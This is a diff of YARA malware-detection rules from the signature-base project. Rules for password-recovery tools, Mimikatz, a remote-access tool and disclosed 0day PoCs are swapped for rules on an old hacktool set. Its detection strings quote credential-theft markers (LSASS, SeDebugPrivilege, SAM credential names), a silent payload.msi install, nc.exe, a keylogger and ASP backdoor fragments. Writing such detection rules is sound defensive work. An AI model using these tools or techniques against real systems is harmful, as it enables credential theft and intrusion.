+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L1653-L1669"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "26af6fe1b3dfe8e3a48c03a9f6f2033fbc909a677d35159e28b7e9b867ea5542"
-		score = 75
+		hash = "74d223a56f97b223a640e4139bb9b94d8faa895d"
+		logic_hash = "6cf454d11bc806b3a30c52b730994adb8d92613c92849162717f415e5681e417"
+		score = 60
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "e7d158d27d9c14a4f15a52ee5bf8aa411b35ad510b1b93f5e163ae7819c621e2"
 
 	strings:
-		$s1 = "Failed to get system process ID" fullword wide
-		$s2 = "gLSASS.EXE" fullword wide
-		$s3 = "WriteProcessMemory failed" fullword wide
-		$s4 = "wow64 process NOT created" fullword wide
-		$s5 = "\\ast.exe" wide
-		$s6 = "Exit code=%s, status=%d" fullword wide
-		$s7 = "VirtualProtect failed" fullword wide
-		$s8 = "nSeDebugPrivilege" fullword wide
+		$s1 = "Error get globalgroup memebers: NERR_InvalidComputer" fullword ascii
+		$s6 = "Error get users from server!" fullword ascii
+		$s7 = "get in nt by name and null" fullword ascii
+		$s16 = "get something from nt, hold by killusa." fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 100KB and 3 of them )
+		all of them
 }
-rule SIGNATURE_BASE_WPR_Loader_DLL : FILE
+rule SIGNATURE_BASE_Sig_238_Token
 {
 	meta:
-		description = "Windows Password Recovery - file loader64.dll"
+		description = "Disclosed hacktool set (old stuff) - file token.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "d3102ab6-0473-544b-b9dd-ec7a18ae1c4b"
-		date = "2017-03-15"
+		id = "9d0ac24b-2078-5455-8d9e-a642c71f7b2d"
+		date = "2014-11-23"
 		modified = "2025-12-18"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L3485-L3518"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L1671-L1688"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "015334828007e954d1e910e6377b37bade99df2ce86152901ec4ded8c71975de"
-		score = 75
+		hash = "c52bc6543d4281aa75a3e6e2da33cfb4b7c34b14"
+		logic_hash = "88d7086a48c6a2e3801db75565184b087e663e80e2364765072fc37a5549b8b5"
+		score = 60
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "7b074cb99d45fc258e0324759ee970467e0f325e5d72c0b046c4142edc6776f6"
-		hash2 = "a1f27f7fd0e03601a11b66d17cfacb202eacf34f94de3c4e9d9d39ea8d1a2612"
 
 	strings:
-		$x1 = "loader64.dll" fullword ascii
-		$x2 = "loader.dll" fullword ascii
-		$s1 = "TUlDUk9TT0ZUX0FVVEhFTlRJQ0FUSU9OX1BBQ0tBR0VfVjFfMA==" fullword ascii
-		$s2 = "UmVtb3RlRGVza3RvcEhlbHBBc3Npc3RhbnRBY2NvdW50" fullword ascii
-		$s3 = "U2FtSVJldHJpZXZlUHJpbWFyeUNyZWRlbnRpYWxz" fullword ascii
-		$s4 = "VFM6SW50ZXJuZXRDb25uZWN0b3JQc3dk" fullword ascii
-		$s5 = "TCRVRUFjdG9yQWx0Q3JlZFByaXZhdGVLZXk=" fullword ascii
-		$s6 = "YXNwbmV0X1dQX1BBU1NXT1JE" fullword ascii
-		$s7 = "TCRBTk1fQ1JFREVOVElBTFM=" fullword ascii
-		$s8 = "RGVmYXVsdFBhc3N3b3Jk" fullword ascii
-		$op0 = { 48 8b cd e8 e0 e8 ff ff 48 89 07 48 85 c0 74 72 }
-		$op1 = { e8 ba 23 00 00 33 c9 ff 15 3e 82 }
-		$op2 = { 48 83 c4 28 e9 bc 55 ff ff 48 8d 0d 4d a7 00 00 }
+		$s0 = "Logon.exe" fullword ascii
+		$s1 = "Domain And User:" fullword ascii
+		$s2 = "PID=Get Addr$(): One" fullword ascii
+		$s3 = "Process " fullword ascii
+		$s4 = "psapi.dllK" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 400KB and ( ( 1 of ( $x* ) and 1 of ( $s* ) ) or ( 1 of ( $s* ) and all of ( $op* ) ) )
+		all of them
 }
-rule SIGNATURE_BASE_WPR_Passscape_Loader : FILE
+rule SIGNATURE_BASE_Sig_238_TELNET
 {
 	meta:
-		description = "Windows Password Recovery - file ast.exe"
+		description = "Disclosed hacktool set (old stuff) - file TELNET.EXE from Windows ME"
 		author = "Florian Roth (Nextron Systems)"
-		id = "d8e224ce-edd2-5e2d-9b6e-a8995f5d2c1c"
-		date = "2017-03-15"
+		id = "fae22e0f-2f69-5dc6-984c-2c07530ad11a"
+		date = "2014-11-23"
 		modified = "2025-12-18"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L3520-L3538"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L1690-L1706"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "79b1a3ed1ea0d9a3ddee0b8557393318a8baf4812110a6ed03a7106b8096b31e"
-		score = 75
+		hash = "50d02d77dc6cc4dc2674f90762a2622e861d79b1"
+		logic_hash = "4e90d95b7c94933ed5c50f060840291540fc99de0173298b97d2c6ccbf75d26a"
+		score = 60
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "f6f2d4b9f19f9311ec419f05224a1c17cf2449f2027cb7738294479eea56e9cb"
 
 	strings:
-		$s1 = "SYSTEM\\CurrentControlSet\\Services\\PasscapeLoader64" fullword wide
-		$s2 = "ast64.dll" fullword ascii
-		$s3 = "\\loader64.exe" wide
-		$s4 = "Passcape 64-bit Loader Service" fullword wide
-		$s5 = "PasscapeLoader64" fullword wide
-		$s6 = "ast64 {msg1GkjN7Sh8sg2Al7ker63f}" fullword wide
+		$s0 = "TELNET [host [port]]" fullword wide
+		$s2 = "TELNET.EXE" fullword wide
+		$s4 = "Microsoft(R) Windows(R) Millennium Operating System" fullword wide
+		$s14 = "Software\\Microsoft\\Telnet" fullword wide
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 200KB and 2 of them )
+		all of them
 }
-rule SIGNATURE_BASE_WPR_Asterisk_Hook_Library : FILE
+rule SIGNATURE_BASE_Snifferport
 {
 	meta:
-		description = "Windows Password Recovery - file ast64.dll"
+		description = "Disclosed hacktool set (old stuff) - file snifferport.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "03c20c9d-bb8f-53f6-9cb5-9b059fb24949"
-		date = "2017-03-15"
+		id = "5b903344-18d2-5d3d-be66-7260a5f3ea4b"
+		date = "2014-11-23"
 		modified = "2025-12-18"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L3540-L3562"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L1708-L1725"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "6bb75cb8c3ba18a34f4651532060154608c78e6f748148226da4416ad1171124"
-		score = 75
+		hash = "d14133b5eaced9b7039048d0767c544419473144"
+		logic_hash = "361f1a55ed4bd5a7a5d01d346c4efd1b83e701363484282235b5aab18d3abe1a"
+		score = 60
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "225071140e170a46da0e57ce51f0838f4be00c8f14e9922c6123bee4dffde743"
-		hash2 = "95ec84dc709af990073495082d30309c42d175c40bd65cad267e6f103852a02d"
 
 	strings:
-		$s1 = "ast64.dll" fullword ascii
-		$s2 = "ast.dll" fullword wide
-		$s3 = "c:\\%s.lvc" fullword ascii
-		$s4 = "c:\\%d.lvc" fullword ascii
-		$s5 = "Asterisk Hook Library" fullword wide
-		$s6 = "?Ast_StartRd64@@YAXXZ" fullword ascii
-		$s7 = "Global\\{1374821A-281B-9AF4-%04X-12345678901234}" fullword ascii
-		$s8 = "2004-2013 Passcape Software" fullword wide
-		$s9 = "Global\\Passcape#6712%04X" fullword ascii
+		$s0 = "iphlpapi.DLL" fullword ascii
+		$s5 = "ystem\\CurrentCorolSet\\" ascii
+		$s11 = "Port.TX" fullword ascii
+		$s12 = "32Next" fullword ascii
+		$s13 = "V1.2 B" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 300KB and 3 of them )
+		all of them
 }
-rule SIGNATURE_BASE_WPR_Windowspasswordrecovery_EXE : FILE
+rule SIGNATURE_BASE_Sig_238_Webget
 {
 	meta:
-		description = "Windows Password Recovery - file wpr.exe"
+		description = "Disclosed hacktool set (old stuff) - file webget.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "7fa2062c-75dd-55aa-8775-631a9c1a497e"
-		date = "2017-03-15"
+		id = "b03a2463-94fe-5050-8e3d-269101a03cda"
+		date = "2014-11-23"
 		modified = "2025-12-18"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L3564-L3593"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L1727-L1743"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "0f2995a8ba1644d384167221560aa0c3f074e8e2cf2b79bbb06537fcaed2df7f"
-		score = 75
+		hash = "36b5a5dee093aa846f906bbecf872a4e66989e42"
+		logic_hash = "958c465caddf6436b29042f1f1772e039d011d23ff13d91818a9d7ad21a2c750"
+		score = 60
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "c1c64cba5c8e14a1ab8e9dd28828d036581584e66ed111455d6b4737fb807783"
 
 	strings:
-		$x1 = "UuPipe" fullword ascii
-		$x2 = "dbadllgl" fullword ascii
-		$x3 = "UkVHSVNUUlkgTU9O" fullword ascii
-		$x4 = "RklMRSBNT05JVE9SIC0gU1l" fullword ascii
-		$s1 = "WPR.exe" fullword wide
-		$s2 = "Windows Password Recovery" fullword wide
-		$op0 = { 5f df 27 17 89 }
-		$op1 = { 5f 00 00 f2 e5 cb 97 }
-		$op2 = { e8 ed 00 f0 cc e4 00 a0 17 }
+		$s0 = "Packed by exe32pack" ascii
+		$s1 = "GET A HTTP/1.0" fullword ascii
+		$s2 = " error " fullword ascii
+		$s13 = "Downloa" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 20000KB and ( 1 of ( $x* ) or all of ( $s* ) or all of ( $op* ) )
+		all of them
 }
-rule SIGNATURE_BASE_WPR_Windowspasswordrecovery_EXE_64 : FILE
+rule SIGNATURE_BASE_Xyzcmd_Zip_Folder_Xyzcmd
 {
 	meta:
-		description = "Windows Password Recovery - file ast64.exe"
+		description = "Disclosed hacktool set (old stuff) - file XYZCmd.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "0f6c7695-e616-5757-b9cd-8cff5f972c3e"
-		date = "2017-03-15"
+		id = "c3d70b93-1d53-5403-bd22-d1e4bad5042b"
+		date = "2014-11-23"
 		modified = "2025-12-18"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L3595-L3612"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L1745-L1761"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "6cdd46609d401b7c12b936de7f64bab0bc45b9d2c6079fae45a96f5be6857b82"
-		score = 75
+		hash = "bbea5a94950b0e8aab4a12ad80e09b630dd98115"
+		logic_hash = "ad0e8f964c7be376236b50ea370de3e433fa9e7b043663d8f32fad06997056ea"
+		score = 60
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "4e1ea81443b34248c092b35708b9a19e43a1ecbdefe4b5180d347a6c8638d055"
 
 	strings:
-		$s1 = "%B %d %Y  -  %H:%M:%S" fullword wide
-		$op0 = { 48 8d 8c 24 50 22 00 00 e8 bf eb ff ff 4c 8b c7 }
-		$op1 = { ff 15 16 25 01 00 f7 d8 1b }
-		$op2 = { e8 c2 26 00 00 83 20 00 83 c8 ff 48 8b 5c 24 30 }
+		$s0 = "Executes Command Remotely" fullword wide
+		$s2 = "XYZCmd.exe" fullword wide
+		$s6 = "No Client Software" fullword wide
+		$s19 = "XYZCmd V1.0 For NT S" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 300KB and all of them )
+		all of them
 }
-rule SIGNATURE_BASE_Beyondexec_Remoteaccess_Tool : FILE
+rule SIGNATURE_BASE_Aspack_Chinese
 {
 	meta:
-		description = "Detects BeyondExec Remote Access Tool - file rexesvr.exe"
+		description = "Disclosed hacktool set (old stuff) - file ASPack Chinese.ini"
 		author = "Florian Roth (Nextron Systems)"
-		id = "fd68cb45-a46f-53d7-bf52-8f7bd3636d0d"
-		date = "2017-03-17"
+		id = "ac821117-7534-5dec-9477-25be87361900"
+		date = "2014-11-23"
 		modified = "2025-12-18"
-		reference = "https://goo.gl/BvYurS"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L3623-L3641"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L1763-L1780"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "6f21ddf04ab0d29549c3d07a45afb3e7648a15b0c81f88b8d7ccccc436ba4084"
-		score = 75
+		hash = "02a9394bc2ec385876c4b4f61d72471ac8251a8e"
+		logic_hash = "98b3af76986cd41190612a2fdfbd9ba48f102456897f4acaedd89a40ab5a582a"
+		score = 60
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "3d3e3f0708479d951ab72fa04ac63acc7e5a75a5723eb690b34301580747032c"
 
 	strings:
-		$x1 = "\\BeyondExecV2\\Server\\Release\\Pipes.pdb" ascii
-		$x2 = "\\\\.\\pipe\\beyondexec%d-stdin" fullword ascii
-		$x3 = "Failed to create dispatch pipe. Do you have another instance running?" fullword ascii
-		$op1 = { 83 e9 04 72 0c 83 e0 03 03 c8 ff 24 85 80 6f 40 }
-		$op2 = { 6a 40 33 c0 59 bf e0 d8 40 00 f3 ab 8d 0c 52 c1 }
+		$s0 = "= Click here if you want to get your registered copy of ASPack" fullword ascii
+		$s1 = ";  For beginning of translate - copy english.ini into the yourlanguage.ini" fullword ascii
+		$s2 = "E-Mail:                      shinlan@km169.net" fullword ascii
+		$s8 = ";  Please, translate text only after simbol '='" fullword ascii
+		$s19 = "= Compress with ASPack" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 200KB and ( 1 of ( $x* ) or all of ( $op* ) ) ) or ( 3 of them )
+		all of them
 }
-rule SIGNATURE_BASE_Mimikatz_Gen_Strings : FILE
+rule SIGNATURE_BASE_Aspbackdoor_EDIR
 {
 	meta:
-		description = "Detects Mimikatz by using some special strings"
+		description = "Disclosed hacktool set (old stuff) - file EDIR.ASP"
 		author = "Florian Roth (Nextron Systems)"
-		id = "3f4ab5d7-5a9f-55f0-9dda-e2975df582a0"
-		date = "2017-06-19"
+		id = "0895091a-b620-5746-8245-d44716ec2bbe"
+		date = "2014-11-23"
 		modified = "2025-12-18"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L3643-L3665"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L1782-L1799"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "371e74538a63cfe355ebd31e1ac73cd25e92f3a7ce3f9299e0f3406f2bcb5b01"
-		score = 75
+		hash = "03367ad891b1580cfc864e8a03850368cbf3e0bb"
+		logic_hash = "be7d956333107a57a0fd86c69fc9eabcd3d9daf3f66385c44ba246fc2000dc4d"
+		score = 60
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash1 = "058cc8b3e4e4055f3be460332a62eb4cbef41e3a7832aceb8119fd99fea771c4"
-		hash2 = "eefd4c038afa0e80cf6521c69644e286df08c0883f94245902383f50feac0f85"
-		hash3 = "f35b589c1cc1c98c4c4a5123fd217bdf0d987c00d2561992cbfb94bd75920159"
 
 	strings:
-		$s1 = "[*] '%s' service already started" fullword wide
-		$s2 = "** Security Callback! **" fullword wide
-		$s3 = "Try to export a software CA to a crypto (virtual)hardware" fullword wide
-		$s4 = "enterpriseadmin" fullword wide
-		$s5 = "Ask debug privilege" fullword wide
-		$s6 = "Injected =)" fullword wide
-		$s7 = "** SAM ACCOUNT **" fullword wide
+		$s1 = "response.write \"<a href='index.asp'>" fullword ascii
+		$s3 = "if Request.Cookies(\"password\")=\"" ascii
+		$s6 = "whichdir=server.mappath(Request(\"path\"))" fullword ascii
+		$s7 = "Set fs = CreateObject(\"Scripting.FileSystemObject\")" fullword ascii
+		$s19 = "whichdir=Request(\"path\")" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 12000KB and 1 of them )
+		all of them
 }
-rule SIGNATURE_BASE_Disclosed_0Day_Pocs_Lpe : FILE
+rule SIGNATURE_BASE_Bypassfirewall_Zip_Folder_Ie
 {
 	meta:
-		description = "Detects POC code from disclosed 0day hacktool set"
+		description = "Disclosed hacktool set (old stuff) - file Ie.dll"
 		author = "Florian Roth (Nextron Systems)"
-		id = "d3693d1d-6085-5e62-8f0b-dde5b14758b7"
-		date = "2017-07-07"
+		id = "7bd10fa1-be2d-5882-b4c7-b696612343e5"
+		date = "2014-11-23"
 		modified = "2025-12-18"
-		reference = "Disclosed 0day Repos"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L3677-L3698"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L1801-L1817"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "77d72792d7fcf2c54b36d124448e928f306981296715e583d346ccd101e22fc7"
-		score = 75
+		hash = "d1b9058f16399e182c9b78314ad18b975d882131"
+		logic_hash = "844e260870f075b0afae0667691e61ab8f138a29871f9a18d1f2b623f9bb9e2a"
+		score = 60
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "e10ee278f4c86d6ee1bd93a7ed71d4d59c0279381b00eb6153aedfb3a679c0b5"
-		hash2 = "a5916cefa0f50622a30c800e7f21df481d7a3e1e12083fef734296a22714d088"
-		hash3 = "5b701a5b5bbef7027711071cef2755e57984bfdff569fe99efec14a552d8ee43"
 
 	strings:
-		$x1 = "msiexec /f c:\\users\\%username%\\downloads\\" ascii
-		$x2 = "c:\\users\\%username%\\downloads\\bat.bat" fullword ascii
-		$x3 = "\\payload.msi /quiet" ascii
-		$x4 = "\\payload2\\WindowsTrustedRTProxy.sys" wide
-		$x5 = "\\payload2" wide
-		$x6 = "\\payload" wide
-		$x7 = "WindowsTrustedRTProxy.sys /grant:r administrators:RX" ascii
+		$s0 = "d:\\documents and settings\\loveengeng\\desktop\\source\\bypass\\lcc\\ie.dll" fullword ascii
+		$s1 = "LOADER ERROR" fullword ascii
+		$s5 = "The procedure entry point %s could not be located in the dynamic link library %s" fullword ascii
+		$s7 = "The ordinal %u could not be located in the dynamic link library %s" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 70KB and 1 of them )
+		all of them
 }
-rule SIGNATURE_BASE_Disclosed_0Day_Pocs_Exploit : FILE
+rule SIGNATURE_BASE_Editkeylogreadme
 {
 	meta:
-		description = "Detects POC code from disclosed 0day hacktool set"
+		description = "Disclosed hacktool set (old stuff) - file EditKeyLogReadMe.txt"
 		author = "Florian Roth (Nextron Systems)"
-		id = "72b8aafd-d79a-5812-90fd-5d5aca109254"
-		date = "2017-07-07"
+		id = "db083c04-9e5c-5cfd-b4d4-eecf28191b6b"
+		date = "2014-11-23"
 		modified = "2025-12-18"
-		reference = "Disclosed 0day Repos"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L3700-L3714"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L1819-L1837"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "12a7a04fdc621242f42107204996e44b1962b5ac5eef4f9b9cbbe0ad52b85676"
-		score = 75
-		quality = 85
-		tags = "FILE"
+		hash = "dfa90540b0e58346f4b6ea12e30c1404e15fbe5a"
+		logic_hash = "a58a2336e7d714a2e7f60eec8dacbee9a7190552dd791d8b6eba084ffaf0904a"
+		score = 60
+		quality = 35
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "632d35a0bac27c9b2f3f485d43ebba818089cf72b3b8c4d2e87ce735b2e67d7e"
 
 	strings:
-		$x1 = "\\Release\\exploit.pdb" ascii
-		$x2 = "\\favorites\\stolendata.txt" wide
+		$s0 = "editKeyLog.exe KeyLog.exe," fullword ascii
+		$s1 = "WinEggDrop.DLL" fullword ascii
+		$s2 = "nc.exe" fullword ascii
+		$s3 = "KeyLog.exe" fullword ascii
+		$s4 = "EditKeyLog.exe" fullword ascii
+		$s5 = "wineggdrop" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 200KB and 1 of them )
+		3 of them
 }
-rule SIGNATURE_BASE_Disclosed_0Day_Pocs_Injectdll : FILE
+rule SIGNATURE_BASE_Passsniffer_Zip_Folder_Readme
 {
 	meta:
-		description = "Detects POC code from disclosed 0day hacktool set"
+		description = "Disclosed hacktool set (old stuff) - file readme.txt"
 		author = "Florian Roth (Nextron Systems)"
-		id = "90a4dca0-4f12-5946-9d5d-0b93bb5a3c5d"
-		date = "2017-07-07"
-		modified = "2022-12-21"
-		reference = "Disclosed 0day Repos"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L3716-L3734"
+		id = "f5965aa8-0f78-56fd-8e3e-6dc013942cb3"
+		date = "2014-11-23"
+		modified = "2025-12-18"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L1839-L1854"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "b0a9bd4fa2d8a1192258b303cb757c8bbce7f6962a1d895f57add8a1c3887799"
-		score = 75
+		hash = "a52545ae62ddb0ea52905cbb61d895a51bfe9bcd"
+		logic_hash = "d9e6cd2ba7e98481664b0560184a07349bb471dd370c4b73ef5f5f05a8e89946"
+		score = 60
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "173d3f78c9269f44d069afbd04a692f5ae42d5fdc9f44f074599ec91e8a29aa2"
 
 	strings:
-		$x1 = "\\Release\\InjectDll.pdb" ascii
-		$x2 = "Specify -l to list all IE processes running in the current session" fullword ascii
-		$x3 = "Usage: InjectDll -l|pid PathToDll" fullword ascii
-		$x4 = "Injecting DLL: %ls into PID: %d" fullword ascii
-		$x5 = "Error adjusting privilege %d" fullword ascii
+		$s0 = "PassSniffer.exe" fullword ascii
+		$s1 = "POP3/FTP Sniffer" fullword ascii
+		$s2 = "Password Sniffer V1.0" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 300KB and 1 of them )
+		1 of them
 }
-rule SIGNATURE_BASE_Disclosed_0Day_Pocs_Payload_MSI : FILE
+rule SIGNATURE_BASE_Sig_238_Gina
 {
 	meta:
-		description = "Detects POC code from disclosed 0day hacktool set"
+		description = "Disclosed hacktool set (old stuff) - file gina.reg"
 		author = "Florian Roth (Nextron Systems)"
-		id = "fe32af56-d5a1-5246-a7df-395b9cd02faf"
-		date = "2017-07-07"
-		modified = "2022-12-21"
-		reference = "Disclosed 0day Repos"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L3736-L3752"
+		id = "85c19493-e6d4-55e8-8526-6817243e90cf"
+		date = "2014-11-23"
+		modified = "2025-12-18"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L1856-L1871"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "7dfc8d2bd871ad6acb7d362a946d34ed1830f42ab625c3d3d9cb512f28ccdb57"
-		score = 75
+		hash = "324acc52566baf4afdb0f3e4aaf76e42899e0cf6"
+		logic_hash = "f0ece7406a31f5a4212da5c4144233c5c45b8120d09267fdf7e291d6c9827384"
+		score = 60
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "a7c498a95850e186b7749a96004a98598f45faac2de9b93354ac93e627508a87"
 
 	strings:
-		$s1 = "WShell32.dll" fullword wide
-		$s2 = "Target empty, so account name translation begins on the local system." fullword wide
-		$s3 = "\\custact\\x86\\AICustAct.pdb" ascii
+		$s0 = "\"gina\"=\"gina.dll\"" fullword ascii
+		$s1 = "REGEDIT4" fullword ascii
+		$s2 = "[HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon]" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0xcfd0 and filesize < 1000KB and all of them )
+		all of them
 }
-rule SIGNATURE_BASE_Disclosed_0Day_Pocs_Injector : FILE
+rule SIGNATURE_BASE_Splitjoin
 {
 	meta:
-		description = "Detects POC code from disclosed 0day hacktool set"
+		description = "Disclosed hacktool set (old stuff) - file splitjoin.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "6de89a84-fe16-5064-8cbb-a3b9003f4c0c"
-		date = "2017-07-07"
+		id = "2f1a69cd-34b3-5af0-a054-fe19d9becb25"
+		date = "2014-11-23"
 		modified = "2025-12-18"
-		reference = "Disclosed 0day Repos"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L3754-L3774"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L1873-L1889"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "37ed19fe19d3645adcd5fa7d6f6b3572d2821fdb78a6d0c8afdba6ccecfc8528"
-		score = 75
-		quality = 60
-		tags = "FILE"
+		hash = "e4a9ef5d417038c4c76b72b5a636769a98bd2f8c"
+		logic_hash = "dede4518ed9be28e89bc67dab4e68503383c16746f088f37a4c8069e256183ca"
+		score = 60
+		quality = 85
+		tags = ""
